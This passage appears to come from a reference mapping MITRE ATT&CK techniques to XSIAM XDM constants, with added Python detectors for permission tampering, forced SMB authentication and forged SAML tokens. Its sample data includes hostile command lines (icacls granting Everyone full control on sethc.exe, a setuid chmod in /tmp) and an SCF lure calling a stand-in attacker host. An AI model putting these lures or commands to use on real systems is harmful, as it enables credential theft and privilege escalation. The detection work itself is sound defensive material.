include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS
Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like
SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation:
Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such
as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being
exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If
an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to
compromise of the underlying instance or container. This can allow an adversary a path to access the cloud
or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/
T1611), or take advantage of weak identity and access management policies. For websites and databases,
the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation:
OWASP Top 10)(Citation: CWE top 25) https://attack.mitre.org/techniques/T1190
T1203 XDM_CONST.MITRE_TECHNIQUE_EXPLOITATION_FOR_CLIENT_EXECUTION Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can
exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can
take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code
execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain
code execution on a remote system because they can be used to gain access to that system. Users will
expect to see files related to the applications they commonly use to do work, so they are a useful target for
exploit research and development because of their high utility. Several types exist. Browser-based
Exploitation: Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/
techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint
systems may be compromised through normal web browsing or from certain users being targeted by links
in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not
require an action by the user for the exploit to be executed. Office Applications: Common office and
productivity applications such as Microsoft Office are also targeted through [Phishing](https://
attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through
links to download them. These require the user to open the document or file for the exploit to run.
Common Third-party Applications: Other applications that are commonly seen or are part of the software
deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and
Flash, which are common in enterprise environments, have been routinely targeted by adversaries
attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may
be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been
delivered as objects within Microsoft Office documents. https://attack.mitre.org/techniques/T1203
T1212 XDM_CONST.MITRE_TECHNIQUE_EXPLOITATION_FOR_CREDENTIAL_ACCESS Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a
software vulnerability occurs when an adversary takes advantage of a programming error in a program,
service, or within the operating system software or kernel itself to execute adversary-controlled
code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a
means to gain access to useful credentials or circumvent the process to gain access to systems. One
example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using
domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets)
Exploitation for credential access may also result in Privilege Escalation depending on the process targeted
or credentials obtained. https://attack.mitre.org/techniques/T1212
T1211 XDM_CONST.MITRE_TECHNIQUE_EXPLOITATION_FOR_DEFENSE_EVASION Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a
software vulnerability occurs when an adversary takes advantage of a programming error in a program,
service, or within the operating system software or kernel itself to execute adversary-controlled
code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent
them. Adversaries may have prior knowledge through reconnaissance that security software exists within
an environment or they may perform checks during or shortly after the system is compromised for [Security
Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be
targeted directly for exploitation. There are examples of antivirus software being targeted by persistent
threat groups to avoid detection. https://attack.mitre.org/techniques/T1211
T1068 XDM_CONST.MITRE_TECHNIQUE_EXPLOITATION_FOR_PRIVILEGE_ESCALATION Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a
software vulnerability occurs when an adversary takes advantage of a programming error in a program,
service, or within the operating system software or kernel itself to execute adversary-controlled code.
Security constructs such as permission levels will often hinder access to information and use of certain
techniques, so adversaries will likely need to perform privilege escalation to include use of software
exploitation to circumvent those restrictions. When initially gaining access to a system, an adversary may
be operating within a lower privileged process which will prevent them from accessing certain resources on
the system. Vulnerabilities may exist, usually in operating system components and software commonly
running at higher permissions, that can be exploited to gain higher levels of access on the system. This
could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions
depending on the component that is vulnerable. This could also enable an adversary to move from a
virtualized environment, such as within a virtual machine or container, onto the underlying host. This may
be a necessary step for an adversary compromising an endpoint system that has been properly configured
and limits other privilege escalation methods. Adversaries may bring a signed vulnerable driver onto a
compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This
process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole
June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files
delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://
attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).
https://attack.mitre.org/techniques/T1068
T1210 XDM_CONST.MITRE_TECHNIQUE_EXPLOITATION_OF_REMOTE_SERVICES Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a
network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a
programming error in a program, service, or within the operating system software or kernel itself to execute
adversary-controlled code. A common goal for post-compromise exploitation of remote services is for
lateral movement to enable access to a remote system. An adversary may need to determine if the remote
system is in a vulnerable state, which may be done through [Network Service Scanning](https://
attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software
that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security
software that may be used to detect or contain remote exploitation. Servers are likely a high value target for
lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or
access to additional resources. There are several well-known vulnerabilities that exist in common services
such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well
as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662)
and web server services. (Citation: NVD CVE-2014-7169) Depending on the permissions level of the
vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://
attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. https://
attack.mitre.org/techniques/T1210
T1133 XDM_CONST.MITRE_TECHNIQUE_EXTERNAL_REMOTE_SERVICES Adversaries may leverage external-facing remote services to initially access and/or persist within a network.
Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal
enterprise network resources from external locations. There are often remote service gateways that
manage connections and credential authentication for these services. Services such as [Windows Remote
Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/
T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop) Access to
[Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which
could be obtained through credential pharming or by obtaining the credentials from users after
compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote
services may be used as a redundant or persistent access mechanism during an operation. Access may
also be gained through an exposed service that doesn’t require authentication. In containerized
environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application
such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42
Hildegard Malware) https://attack.mitre.org/techniques/T1133
T1008 XDM_CONST.MITRE_TECHNIQUE_FALLBACK_CHANNELS Adversaries may use fallback or alternate communication channels if the primary channel is compromised
or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.
https://attack.mitre.org/techniques/T1008
T1083 XDM_CONST.MITRE_TECHNIQUE_FILE_AND_DIRECTORY_DISCOVERY Adversaries may enumerate files and directories or may search in specific locations of a host or network
share for certain information within a file system. Adversaries may use the information from [File and
Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-
on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find,
and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and
directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). https://
attack.mitre.org/techniques/T1083
Original Mapped Description
T1222 XDM_CONST.MITRE_TECHNIQUE_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and
access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May
2018) File and directory permissions are commonly managed by ACLs configured by the file or directory
owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform,
but generally explicitly designate which users or groups can perform which actions (read, write, execute,
etc.). Modifications may include changing specific access rights, which may require taking ownership of a
file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This
may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific
file and directory modifications may be a required step for many techniques, such as establishing
Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon
Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification]
(https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration
files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). https://attack.mitre.org/
techniques/T1222
T1222.002 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION_LINUX_AND_MAC_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and
access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May
2018) File and directory permissions are commonly managed by ACLs configured by the file or directory
owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform,
but generally explicitly designate which users or groups can perform which actions (read, write, execute,
etc.). Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and
other) and a standard set of permissions (read, write, and execute) that are applied to each group. While
nuances of each platform’s permissions implementation may vary, most of the platforms provide two
primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod
(short for change mode). Adversaries may use these commands to make themselves the owner of files and
directories or change the mode if current permissions allow it. They could subsequently lock others out of
the file. Specific file and directory modifications may be a required step for many techniques, such as
establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/
T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow]
(https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) https://
attack.mitre.org/techniques/T1222/002
T1222.001 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION_WINDOWS_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and
access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May
2018) File and directory permissions are commonly managed by ACLs configured by the file or directory
owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform,
but generally explicitly designate which users or groups can perform which actions (read, write, execute,
etc.). Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation:
Microsoft DACL May 2018) Similar to a standard ACL, a DACL identifies the accounts that are allowed or
denied access to a securable object. When an attempt is made to access a securable object, the system
checks the access control entries in the DACL in order. If a matching entry is found, access to the object is
granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018) Adversaries can
interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`,
which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://
attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and
directory DACLs. Specific file and directory modifications may be a required step for many techniques, such
as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008),
[Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other
instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/
T1574). https://attack.mitre.org/techniques/T1222/001
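Added example, not part of the XSIAM schema or of ATT&CK: a small Python tagger that classifies process-creation command lines for the two sub-techniques above, T1222.002 (chmod/chown/chgrp on Linux and macOS) and T1222.001 (icacls, cacls, takeown, attrib on Windows), and labels each hit with the constant listed on this page. The event dictionary shape, the severity labels, the list of "broad" grantees, the mode heuristics and the sample command lines are all assumptions made for the example; mapping the result onto xdm fields is left to the schema.

```python
"""Tag process-creation events that change file/directory permissions (T1222.001 / T1222.002).

Added example, not part of the XSIAM schema or ATT&CK. The event shape, the severity
labels and the sample command lines are all constructed for illustration.
"""
import ntpath
import posixpath
import re
import shlex

# Constant names exactly as they appear in the XDM_CONST.MITRE_TECHNIQUE table on this page.
WINDOWS_CONST = ("XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION"
                 "_WINDOWS_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION")
LINUX_MAC_CONST = ("XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION"
                   "_LINUX_AND_MAC_FILE_AND_DIRECTORY_PERMISSIONS_MODIFICATION")

WINDOWS_TOOLS = {"icacls", "cacls", "takeown", "attrib"}
# Grantees that hand rights to every principal (compared lower-cased, domain prefix stripped). Assumption.
BROAD_GRANTEES = {"everyone", "*s-1-1-0", "authenticated users", "*s-1-5-11", "users", "*s-1-5-32-545"}

POSIX_TOOLS = {"chmod", "chown", "chgrp"}
# Octal or symbolic modes that leave a path world-writable, or that set the setuid/setgid bits.
WORLD_WRITABLE = re.compile(r"^(?:[0-7]?[0-7][0-7][2367]|.*[oa][+=][rwxst]*w.*)$")
SETID = re.compile(r"^(?:[2-7][0-7]{3}|.*[ugoa]*\+[rwx]*s.*)$")


def classify_windows(cmdline):
    """Return (reason, severity) for an ACL/ownership change on Windows, else None."""
    toks = cmdline.split()                      # icacls/cacls switches never contain spaces
    if not toks:
        return None
    exe = ntpath.basename(toks[0]).lower()
    exe = exe[:-4] if exe.endswith(".exe") else exe
    if exe not in WINDOWS_TOOLS:
        return None
    low = [t.lower() for t in toks[1:]]
    if exe == "takeown":
        return "ownership taken with takeown", "high"
    if exe == "attrib":
        return ("read-only/system attribute cleared with attrib", "medium") if {"-r", "-s"} & set(low) else None
    switches = ("/grant", "/grant:r") if exe == "icacls" else ("/g", "/p")
    for i, t in enumerate(low):
        if t == "/setowner":
            return "owner changed with icacls /setowner", "high"
        if t in switches and i + 1 < len(low):
            grantee, _, rights = low[i + 1].partition(":")
            grantee = grantee.strip('"').rsplit("\\", 1)[-1]
            broad = grantee in BROAD_GRANTEES or "f" in rights   # F = full control
            return f"{exe} grants {rights or '?'} to {grantee}", "high" if broad else "low"
    return None


def classify_posix(cmdline):
    """Return (reason, severity) for a risky chmod/chown/chgrp on Linux or macOS, else None."""
    try:
        toks = shlex.split(cmdline)
    except ValueError:                          # unbalanced quotes: not a parseable command
        return None
    if not toks or posixpath.basename(toks[0]) not in POSIX_TOOLS:
        return None
    exe = posixpath.basename(toks[0])
    operands = [t for t in toks[1:] if not t.startswith("-")]   # drop -R and friends
    if exe in ("chown", "chgrp"):
        return (f"ownership changed with {exe}", "medium") if operands else None
    if not operands:
        return None
    mode = operands[0]
    if SETID.match(mode):
        return f"setuid/setgid mode {mode}", "high"
    if WORLD_WRITABLE.match(mode):
        return f"world-writable mode {mode}", "medium"
    return None


def tag_event(event):
    """Attach the page's technique constant to a process event, or return None if it is benign."""
    if event["os"] == "windows":
        hit, const = classify_windows(event["cmdline"]), WINDOWS_CONST
    else:
        hit, const = classify_posix(event["cmdline"]), LINUX_MAC_CONST
    if hit is None:
        return None
    reason, severity = hit
    return {"technique_const": const, "severity": severity, "reason": reason,
            "user": event["user"], "command_line": event["cmdline"]}


def scan(events):
    return [t for t in (tag_event(e) for e in events) if t]


SAMPLE_EVENTS = [  # constructed sample telemetry, not real data
    {"os": "windows", "user": "CORP\\jdoe", "cmdline": r"icacls C:\Windows\System32\sethc.exe /grant Everyone:F"},
    {"os": "windows", "user": "CORP\\jdoe", "cmdline": r"takeown /f C:\Windows\System32\sethc.exe"},
    {"os": "windows", "user": "CORP\\svc-backup", "cmdline": r'icacls D:\backups /grant "CORP\svc-backup":R'},
    {"os": "linux", "user": "www-data", "cmdline": "chmod 4755 /tmp/.x/sh"},
    {"os": "linux", "user": "root", "cmdline": "chmod 644 /etc/motd"},
    {"os": "linux", "user": "deploy", "cmdline": "chmod o+w /etc/cron.d/backup"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"], finding["reason"], "<-", finding["command_line"])
```

The Windows branch keys on the switch that follows the target path rather than on the tool name alone, because `icacls` is also what administrators use to read or back up ACLs; an ACL grant to a narrow principal is still reported, but at low severity, so the event is kept for correlation with the accessibility-feature and startup-script paths the description names without paging anyone on its own.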
T1495 XDM_CONST.MITRE_TECHNIQUE_FIRMWARE_CORRUPTION Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in
devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec
Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on
hardware devices in order to initialize and manage device functionality. These devices could include the
motherboard, hard drive, or video cards. https://attack.mitre.org/techniques/T1495
T1187 XDM_CONST.MITRE_TECHNIQUE_FORCED_AUTHENTICATION Adversaries may gather credential material by invoking or forcing a user to automatically provide
authentication information through a mechanism in which they can intercept. The Server Message Block
(SMB) protocol is commonly used in Windows networks for authentication and communication between
systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB
resource it will automatically attempt to authenticate and send credential information for the current user to
the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise
environments so that users do not need to enter credentials to access network resources. Web Distributed
Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when
SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and
443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
Adversaries may take advantage of this behavior to gain access to user account hashes through forced
SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that
contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://
attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged
accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s).
When the user's system accesses the untrusted resource it will attempt authentication and send
information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation:
GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force]
(https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation:
Cylance Redirect to SMB) There are several different ways this can occur. (Citation: Osanda Stealing
NetNTLM Hashes) Some specifics from in-the-wild use include: * A spearphishing attachment containing a
document with a resource that is automatically loaded when the document is opened (i.e. [Template
Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request
similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT
APT Energy Oct 2017) * A modified .LNK or .SCF file with the icon filename pointing to an external
reference such as \\[remote address]\pic.png that will force the system to load the resource when the
icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017) https://
attack.mitre.org/techniques/T1187
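Added example, not part of the XSIAM schema or of ATT&CK: Python checks for the two sides of the forced-authentication pattern described above, the lure (a dropped .SCF whose IconFile, or a document relationship whose Target, points at a UNC or file:// host outside the organisation) and the callback (an SMB flow leaving for a non-internal address). What counts as "internal" (RFC 1918 ranges and two DNS suffixes), the flow record shape and every sample input are assumptions constructed for the example.

```python
"""Spot forced-authentication lures and callbacks (T1187).

Added example, not part of the XSIAM schema or of ATT&CK. Internal ranges/suffixes
and all sample inputs are constructed for illustration.
"""
import configparser
import ipaddress
import re

FORCED_AUTH_CONST = "XDM_CONST.MITRE_TECHNIQUE_FORCED_AUTHENTICATION"
SMB_PORTS = {139, 445}
# Assumption: what "internal" means for this organisation.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
INTERNAL_SUFFIXES = (".corp.example", ".example.internal")
# \\host\share\... or file://host/... ; the host is group 1.
REF_RE = re.compile(r"(?:\\\\|file://)([A-Za-z0-9.\-]+)(?:[\\/]|$)", re.IGNORECASE)


def is_internal_host(host):
    host = host.lower()
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:            # a name: bare NetBIOS names and our own DNS suffixes are internal
        return "." not in host or host.endswith(INTERNAL_SUFFIXES)
    return any(ip in net for net in INTERNAL_NETS)


def external_hosts(text):
    """Hosts referenced by UNC or file:// links anywhere in text (e.g. a .rels part) that are not internal."""
    hosts = {m.group(1).lower() for m in REF_RE.finditer(text)}
    return sorted(h for h in hosts if not is_internal_host(h))


def scf_icon_host(text):
    """Host named in an .SCF file's IconFile entry, or None when it points at a local path."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str                      # keep key case as written in the file
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    for section in cp.sections():
        for key, value in cp.items(section):
            if key.lower() == "iconfile":
                m = REF_RE.match(value.strip().strip('"'))
                return m.group(1).lower() if m else None
    return None


def scf_finding(filename, text):
    """Tag a dropped .SCF whose icon is fetched from a non-internal UNC host."""
    host = scf_icon_host(text)
    if host is None or is_internal_host(host):
        return None
    return {"technique_const": FORCED_AUTH_CONST, "file": filename, "remote_host": host,
            "reason": "SCF IconFile points at a non-internal UNC host"}


def external_smb_flows(flows):
    """Flow records (dicts with src_ip, dst_ip, dst_port, user) carrying SMB to non-internal hosts.

    Caveat from the description above: when SMB is blocked Windows falls back to WebDAV on
    80/443, which looks like ordinary web traffic at the flow level; catch that on the host
    (WebClient service activity) rather than here.
    """
    return [
        {"technique_const": FORCED_AUTH_CONST, "user": f["user"], "src_ip": f["src_ip"],
         "dst_ip": f["dst_ip"], "dst_port": f["dst_port"], "reason": "SMB to non-internal host"}
        for f in flows
        if f["dst_port"] in SMB_PORTS and not is_internal_host(f["dst_ip"])
    ]


# Constructed samples. 203.0.113.0/24 is a documentation range standing in for an attacker host.
SAMPLE_SCF = r"""[Shell]
Command=2
IconFile=\\203.0.113.7\share\pic.ico
[Taskbar]
Command=ToggleDesktop
"""
SAMPLE_RELS = "<Relationship Id='rId1' Target='file://203.0.113.7/Normal.dotm' TargetMode='External'/>"
SAMPLE_FLOWS = [
    {"src_ip": "10.1.2.3", "dst_ip": "10.1.2.10", "dst_port": 445, "user": "CORP\\jdoe"},
    {"src_ip": "10.1.2.3", "dst_ip": "203.0.113.7", "dst_port": 445, "user": "CORP\\jdoe"},
    {"src_ip": "10.1.2.3", "dst_ip": "203.0.113.7", "dst_port": 443, "user": "CORP\\jdoe"},
]

if __name__ == "__main__":
    print(scf_finding("pic.scf", SAMPLE_SCF))
    print(external_hosts(SAMPLE_RELS))
    print(external_smb_flows(SAMPLE_FLOWS))
```

The lure check deliberately reports any non-internal host rather than only IP literals: the description notes that the resource can be an attacker-controlled server named by address or by name, and a public hostname in an IconFile or attachedTemplate target is just as effective at triggering the outbound NTLM exchange.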
T1606 XDM_CONST.MITRE_TECHNIQUE_FORGE_WEB_CREDENTIALS Adversaries may forge credential materials that can be used to gain access to web applications or Internet
services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often
use session cookies, tokens, or other materials to authenticate and authorize user access. Adversaries may
generate these credential materials in order to gain access to web resources. This differs from [Steal Web
Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://
attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged
by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials
often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/
T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Once
forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication
Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other
authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies
January 2019)(Citation: Microsoft SolarWinds Customer Guidance) https://attack.mitre.org/techniques/
T1606
T1606.002 XDM_CONST.MITRE_TECHNIQUE_FORGE_WEB_CREDENTIALS_SAML_TOKENS An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid
SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token
is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime in a
LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable
adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.
(Citation: Cyberark Golden SAML) An adversary may utilize [Private Keys](https://attack.mitre.org/
techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML
tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active
Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing
certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access
Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new
and forged by the adversary, rather than stolen or intercepted from legitimate users. An adversary may gain
administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged
account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/
T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft
SolarWinds Customer Guidance) https://attack.mitre.org/techniques/T1606/002
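Added example, not code from the XSIAM schema or from ATT&CK: a Python triage check for the two things a Golden SAML token tends to get wrong, according to the description above, namely a validity window longer than the IdP's configured lifetime and a signing certificate the IdP does not own (the case where the adversary registers their own AD FS trust). It does not verify the XML signature itself; that needs a proper XML-DSig library and is a separate step. The certificate byte strings, the known-certificate set, the one-hour policy and the assertion skeleton are all constructed assumptions.

```python
"""Triage checks for Golden SAML indicators (T1606.002) on a SAML 2.0 assertion.

Added example, not code from the XSIAM schema or from ATT&CK. It does NOT verify the XML
signature; it checks the lifetime in Conditions and the certificate the token claims was
used to sign it against the IdP's known signing certificates.
"""
import base64
import hashlib
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

SAML_CONST = "XDM_CONST.MITRE_TECHNIQUE_FORGE_WEB_CREDENTIALS_SAML_TOKENS"
NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion", "ds": "http://www.w3.org/2000/09/xmldsig#"}
TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"

# Assumptions: constructed byte strings standing in for real DER certificates, and a
# one-hour assertion lifetime (the default the description above cites).
LEGIT_CERT_DER = b"constructed-stand-in-for-the-idp-token-signing-certificate"
ATTACKER_CERT_DER = b"constructed-stand-in-for-an-adversary-generated-certificate"
MAX_LIFETIME = timedelta(hours=1)


def fingerprint(der):
    return hashlib.sha256(der).hexdigest()


KNOWN_SIGNING_CERTS = {fingerprint(LEGIT_CERT_DER)}   # what the IdP is known to sign with


def make_assertion(subject, not_before, not_on_or_after, cert_der):
    """Minimal assertion skeleton; <ds:Signature> holds only the KeyInfo this check inspects."""
    b64 = base64.b64encode(cert_der).decode()
    return (
        f'<saml:Assertion xmlns:saml="{NS["saml"]}" xmlns:ds="{NS["ds"]}" ID="_1" Version="2.0">'
        '<saml:Issuer>http://sts.corp.example/adfs/services/trust</saml:Issuer>'
        f'<ds:Signature><ds:KeyInfo><ds:X509Data><ds:X509Certificate>{b64}'
        '</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature>'
        f'<saml:Subject><saml:NameID>{subject}</saml:NameID></saml:Subject>'
        f'<saml:Conditions NotBefore="{not_before.strftime(TIME_FMT)}" '
        f'NotOnOrAfter="{not_on_or_after.strftime(TIME_FMT)}"/>'
        '</saml:Assertion>'
    )


def check_assertion(xml_text):
    """Return the list of Golden SAML indicators found (empty list means nothing suspicious)."""
    root = ET.fromstring(xml_text)
    findings = []
    cond = root.find("saml:Conditions", NS)
    if cond is None or not (cond.get("NotBefore") and cond.get("NotOnOrAfter")):
        findings.append("Conditions element missing NotBefore/NotOnOrAfter")
    else:
        nb = datetime.strptime(cond.get("NotBefore"), TIME_FMT).replace(tzinfo=timezone.utc)
        na = datetime.strptime(cond.get("NotOnOrAfter"), TIME_FMT).replace(tzinfo=timezone.utc)
        if na - nb > MAX_LIFETIME:
            findings.append(f"validity window {na - nb} exceeds policy lifetime {MAX_LIFETIME}")
    cert = root.find(".//ds:KeyInfo/ds:X509Data/ds:X509Certificate", NS)
    if cert is None or not (cert.text or "").strip():
        findings.append("no signing certificate in KeyInfo")
    elif fingerprint(base64.b64decode("".join(cert.text.split()))) not in KNOWN_SIGNING_CERTS:
        findings.append("signing certificate fingerprint not in the IdP's known set")
    return findings


def tag_assertion(xml_text):
    """Wrap findings as an event carrying the page's technique constant, or None when clean."""
    findings = check_assertion(xml_text)
    if not findings:
        return None
    subject = ET.fromstring(xml_text).findtext("saml:Subject/saml:NameID", namespaces=NS)
    return {"technique_const": SAML_CONST, "subject": subject, "findings": findings}


# Constructed samples: one ordinary one-hour token, one forged for a privileged account.
T0 = datetime(2024, 1, 1, 12, 0, tzinfo=timezone.utc)
LEGIT_ASSERTION = make_assertion("jdoe@corp.example", T0, T0 + timedelta(hours=1), LEGIT_CERT_DER)
FORGED_ASSERTION = make_assertion("globaladmin@corp.example", T0, T0 + timedelta(days=365), ATTACKER_CERT_DER)

if __name__ == "__main__":
    print(tag_assertion(LEGIT_ASSERTION))
    print(tag_assertion(FORGED_ASSERTION))
```

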